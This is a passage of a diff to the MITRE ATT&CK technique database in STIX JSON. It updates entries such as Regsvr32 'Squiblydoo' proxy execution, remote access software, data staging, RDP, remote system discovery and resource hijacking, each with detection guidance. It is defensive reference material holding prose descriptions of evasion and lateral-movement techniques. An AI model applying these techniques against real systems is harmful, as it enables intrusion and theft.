],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "Process monitoring"
+ ],
+ "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.",
+ "x_mitre_defense_bypassed": [
+ "Digital Certificate Validation",
+ "Application control"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--68f7e3a1-f09f-4164-9a62-16b648a0dd5a",
@@ -21441,7 +22152,7 @@
{
"id": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
"name": "Regsvr32",
- "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)\n\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)",
+ "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)\n\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
@@ -21480,38 +22191,38 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T15:56:13.129Z",
+ "modified": "2020-06-20T22:37:32.931Z",
"created": "2020-01-23T19:52:17.414Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_defense_bypassed": [
- "Digital Certificate Validation",
- "Anti-virus",
- "Process whitelisting"
+ "x_mitre_platforms": [
+ "Windows"
],
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
+ "x_mitre_contributors": [
+ "Casey Smith"
],
- "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)",
"x_mitre_data_sources": [
"Windows Registry",
"Process command-line parameters",
"Process monitoring",
"Loaded DLLs"
],
- "x_mitre_contributors": [
- "Casey Smith"
+ "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_defense_bypassed": [
+ "Digital Certificate Validation",
+ "Anti-virus",
+ "Application control"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Remote Access Software",
- "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n\nRemote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.\n\nAdmin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)",
+ "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n\nRemote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.\n\nAdmin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -21544,29 +22255,29 @@
"phase_name": "command-and-control"
}
],
- "modified": "2020-03-27T18:01:17.681Z",
+ "modified": "2020-06-20T20:42:37.320Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "2.0",
- "x_mitre_contributors": [
- "Matt Kelly, @breakersall"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.\n\n[Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.",
"x_mitre_data_sources": [
"Network intrusion detection system",
"Network protocol analysis",
"Process use of network",
"Process monitoring"
],
- "x_mitre_detection": "Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.\n\n[Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.",
- "x_mitre_network_requirements": true,
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Matt Kelly, @breakersall"
],
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.0"
},
{
"external_references": [
@@ -21574,6 +22285,11 @@
"source_name": "mitre-attack",
"external_id": "T1074.002",
"url": "https://attack.mitre.org/techniques/T1074/002"
+ },
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
}
],
"object_marking_refs": [
@@ -21581,7 +22297,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Remote Data Staging",
- "description": "Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.\n\nBy staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.",
+ "description": "Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nBy staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.",
"id": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -21590,8 +22306,19 @@
"phase_name": "collection"
}
],
- "modified": "2020-03-24T17:21:15.741Z",
+ "modified": "2020-06-24T18:59:15.833Z",
"created": "2020-03-13T21:14:58.206Z",
+ "x_mitre_contributors": [
+ "Praetorian"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "Process monitoring",
+ "File monitoring"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -21599,15 +22326,7 @@
"AWS",
"GCP",
"Azure"
- ],
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "Process monitoring",
- "File monitoring"
- ],
- "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ ]
},
{
"external_references": [
@@ -21693,29 +22412,45 @@
],
"modified": "2020-02-25T19:23:34.204Z",
"created": "2020-02-11T18:23:26.059Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Matthew Demaske, Adaptforward"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.",
- "x_mitre_permissions_required": [
- "Remote Desktop Users",
- "User"
+ "x_mitre_system_requirements": [
+ "RDP service enabled, account in the Remote Desktop Users group"
],
"x_mitre_data_sources": [
"Process monitoring",
"Netflow/Enclave netflow",
"Authentication logs"
],
- "x_mitre_system_requirements": [
- "RDP service enabled, account in the Remote Desktop Users group"
+ "x_mitre_permissions_required": [
+ "Remote Desktop Users",
+ "User"
],
- "x_mitre_contributors": [
- "Matthew Demaske, Adaptforward"
+ "x_mitre_detection": "Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
+ "created": "2020-02-19T18:52:24.547Z",
+ "modified": "2020-02-19T20:53:50.908Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "collection"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a",
+ "description": "Adversaries may target an Exchange server or Office 365 to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services or Office 365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.",
+ "name": "Remote Email Collection",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -21723,22 +22458,6 @@
"url": "https://attack.mitre.org/techniques/T1114/002"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Remote Email Collection",
- "description": "Adversaries may target an Exchange server or Office 365 to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services or Office 365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.",
- "id": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "collection"
- }
- ],
- "modified": "2020-02-19T20:53:50.908Z",
- "created": "2020-02-19T18:52:24.547Z",
"x_mitre_platforms": [
"Office 365",
"Windows"
@@ -21787,30 +22506,38 @@
],
"modified": "2020-03-23T23:35:58.129Z",
"created": "2020-02-25T18:26:16.994Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_permissions_required": [
- "SYSTEM",
- "root"
- ],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\n\nMonitor for processes and command-line arguments associated with hijacking service sessions.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"Netflow/Enclave netflow",
"Authentication logs"
+ ],
+ "x_mitre_detection": "Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\n\nMonitor for processes and command-line arguments associated with hijacking service sessions.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_permissions_required": [
+ "SYSTEM",
+ "root"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
- "id": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Remote Services",
- "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)",
+ "created": "2017-05-31T21:30:29.858Z",
+ "modified": "2020-03-25T12:25:03.251Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "lateral-movement"
+ }
+ ],
+ "type": "attack-pattern",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -21833,18 +22560,10 @@
"source_name": "TechNet Remote Desktop Services"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "lateral-movement"
- }
- ],
- "modified": "2020-03-25T12:25:03.251Z",
- "created": "2017-05-31T21:30:29.858Z",
+ "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)",
+ "name": "Remote Services",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba",
"x_mitre_is_subtechnique": false,
"x_mitre_version": "1.1",
"x_mitre_detection": "Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement.",
@@ -21876,17 +22595,37 @@
"id": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Remote System Discovery",
- "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\\Windows\\System32\\Drivers\\etc\\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. \n\nSpecific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain. In cloud environments, many typical utilities may be used to discover remote systems depending upon the host operating system. In addition, cloud environments often provide APIs that serve information about remote systems and services.",
+ "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\\Windows\\System32\\Drivers\\etc\\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. \n\nSpecific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain.\n\nWithin IaaS (Infrastructure as a Service) environments, remote systems include instances and virtual machines in various states, including the running or stopped state. Cloud providers have created methods to serve information about remote systems, such as APIs and CLIs. For example, AWS provides a DescribeInstances API within the Amazon EC2 API and a describe-instances command within the AWS CLI that can return information about all instances within an account.(Citation: Amazon Describe Instances API)(Citation: Amazon Describe Instances CLI) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project, and Azure's CLI az vm list lists details of virtual machines.(Citation: Google Compute Instances)(Citation: Azure VM List)",
"external_references": [
{
"source_name": "mitre-attack",
- "url": "https://attack.mitre.org/techniques/T1018",
- "external_id": "T1018"
+ "external_id": "T1018",
+ "url": "https://attack.mitre.org/techniques/T1018"
},
{
"external_id": "CAPEC-292",
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/292.html"
+ },
+ {
+ "source_name": "Amazon Describe Instances API",
+ "url": "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html",
+ "description": "Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Amazon Describe Instances CLI",
+ "url": "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html",
+ "description": "Amazon. (n.d.). describe-instances. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Google Compute Instances",
+ "url": "https://cloud.google.com/sdk/gcloud/reference/compute/instances/list",
+ "description": "Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Azure VM List",
+ "url": "https://docs.microsoft.com/en-us/cli/azure/vm?view=azure-cli-latest",
+ "description": "Microsoft. (n.d.). az vm. Retrieved May 26, 2020."
}
],
"object_marking_refs": [
@@ -21899,16 +22638,18 @@
"phase_name": "discovery"
}
],
- "modified": "2020-03-26T18:13:00.634Z",
+ "modified": "2020-05-26T15:02:19.656Z",
"created": "2017-05-31T21:30:28.187Z",
- "x_mitre_version": "2.1",
- "x_mitre_data_sources": [
- "Network protocol analysis",
- "Process monitoring",
- "Process use of network",
- "Process command-line parameters"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_contributors": [
+ "Praetorian",
+ "RedHuntLabs, @redhuntlabs"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
],
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). ",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -21917,16 +22658,17 @@
"Azure",
"AWS"
],
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud environments, the usage of particular commands or APIs to request information about remote systems may be common. Where possible, anomalous usage of these commands and APIs or the usage of these commands and APIs in conjunction with additional unexpected commands may be a sign of malicious use. Logging methods provided by cloud providers that capture history of CLI commands executed or API usage may be utilized for detection.",
+ "x_mitre_data_sources": [
+ "Azure activity logs",
+ "Stackdriver logs",
+ "AWS CloudTrail logs",
+ "Network protocol analysis",
+ "Process monitoring",
+ "Process use of network",
+ "Process command-line parameters"
],
- "x_mitre_contributors": [
- "Praetorian",
- "RedHuntLabs, @redhuntlabs"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.1"
},
{
"external_references": [
@@ -21972,26 +22714,25 @@
],
"modified": "2020-02-10T20:03:11.691Z",
"created": "2020-02-10T20:03:11.691Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"Process command-line parameters",
"Binary file metadata"
],
- "x_mitre_detection": "If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
- "id": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Replication Through Removable Media",
- "description": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -21999,9 +22740,10 @@
"external_id": "T1091"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
+ "description": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.",
+ "name": "Replication Through Removable Media",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -22013,8 +22755,9 @@
"phase_name": "initial-access"
}
],
- "modified": "2019-07-18T17:52:28.429Z",
+ "modified": "2020-07-14T19:45:59.638Z",
"created": "2017-05-31T21:31:08.977Z",
+ "x_mitre_is_subtechnique": false,
"x_mitre_version": "1.0",
"x_mitre_data_sources": [
"File monitoring",
@@ -22063,9 +22806,25 @@
"phase_name": "impact"
}
],
- "modified": "2019-10-10T18:40:46.985Z",
+ "modified": "2020-07-14T19:29:17.574Z",
"created": "2019-04-17T14:50:05.682Z",
- "x_mitre_detection": "Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use of network resources associated with cryptocurrency mining software. Monitor for common cryptomining software process names and files on local systems that may indicate compromise and resource usage.",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows",
+ "AWS",
+ "GCP",
+ "Azure"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
+ "x_mitre_version": "1.1",
"x_mitre_data_sources": [
"Azure activity logs",
"Stackdriver logs",
@@ -22075,31 +22834,11 @@
"Network protocol analysis",
"Network device logs"
],
- "x_mitre_version": "1.1",
- "x_mitre_impact_type": [
- "Availability"
- ],
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows",
- "AWS",
- "GCP",
- "Azure"
- ]
